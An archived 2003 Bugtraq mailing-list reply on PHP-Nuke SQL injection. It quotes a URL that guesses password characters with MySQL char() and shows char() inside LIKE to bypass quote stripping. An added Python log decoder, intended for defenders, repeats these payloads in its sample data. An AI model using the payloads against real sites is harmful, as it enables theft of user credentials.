[28966] in bugtraq
Re: PHPNuke SQL Injection
daemon@ATHENA.MIT.EDU (Martin Eiszner)
Fri Feb 21 16:04:46 2003
Date: Fri, 21 Feb 2003 08:11:18 +0100
From: Martin Eiszner <martin@websec.org>
To: Lucas Armstrong <lucas@cgishield.com>
Message-Id: <20030221081118.33b83771.martin@websec.org>
In-Reply-To: <20030220203611.17077.qmail@www.securityfocus.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
hola,
On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas@cgishield.com> wrote:
> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories
JFYI:
this may be off topic but it is worth mentioning .. a couple of months ago we found out
that the mysql char() function can be used within the "like() - function" to place
quotes.
this may help somebody doing sql-injection in a "quote-stripped :-)" environment.
example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---
and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---
...
nice day,
mEi
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
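The two messages above both rely on MySQL's char() to smuggle characters (a single letter, or the quotes around a LIKE pattern) past quote-stripping filters. From the defender's side the useful tool is a small decoder that turns every char(...) call in a request or query log back into the string it spells, so the intent is visible at review time. The following Python is an added example written for this page; it is not code from either poster or from PHP-Nuke. The log lines it scans are constructed to resemble the URLs in the thread, and the function and variable names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Matches a MySQL CHAR(...) call whose arguments are a comma-separated list of
# integer codes, e.g. char(97) or char(37,114,111,111,116,37). Case-insensitive,
# and tolerant of whitespace (the thread's URL wraps "char" and "(97)" apart).
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)


def decode_char_calls(text):
    """Return [(original_call, decoded_string), ...] for each CHAR() in text.

    Codes above 255 are rendered as '?' because single-byte CHAR() arguments
    are the case the thread discusses; this keeps the decoder predictable.
    """
    results = []
    for match in CHAR_CALL.finditer(text):
        codes = [int(c) for c in match.group(1).split(",")]
        decoded = "".join(chr(c) if c < 256 else "?" for c in codes)
        results.append((match.group(0), decoded))
    return results


def inspect_request(raw_query_string):
    """URL-decode a query string, then report every CHAR() call it carries.

    Returns a dict with the decoded query, the list of (call, decoded) pairs,
    and a boolean 'suspicious' that is True whenever at least one CHAR() call
    is present. A legitimate search query has no reason to contain CHAR().
    """
    decoded = unquote_plus(raw_query_string)
    calls = decode_char_calls(decoded)
    return {
        "decoded_query": decoded,
        "char_calls": calls,
        "suspicious": bool(calls),
    }


def scan_log(lines):
    """Run inspect_request over log lines; return (index, decoded strings) for hits."""
    hits = []
    for index, line in enumerate(lines):
        report = inspect_request(line)
        if report["suspicious"]:
            hits.append((index, [decoded for _, decoded in report["char_calls"]]))
    return hits


# Constructed sample log lines (not real traffic), modelled on the thread's URLs.
SAMPLE_LOG = [
    # benign search
    "name=search&query=kernel&topic=&category=&author=&days=1&type=stories",
    # the letter-guessing probe from Lucas Armstrong's message, URL-encoded
    "name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)%3Dchar(97)&type=stories",
    # the LIKE-with-quotes trick from Martin Eiszner's message, as a raw query
    "select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));",
]


if __name__ == "__main__":
    for index, decoded_strings in scan_log(SAMPLE_LOG):
        print(f"line {index}: CHAR() spells {decoded_strings!r}")
```

Run as a script it prints the decoded payloads for lines 1 and 2 and nothing for the benign line 0. The decoder is a triage aid, not a filter: stripping quotes, as this thread shows, is not a fix, and the durable mitigation is to pass user input to MySQL through parameterised queries (or at minimum a proper escaping function) so that neither quotes nor char() can change the statement's structure.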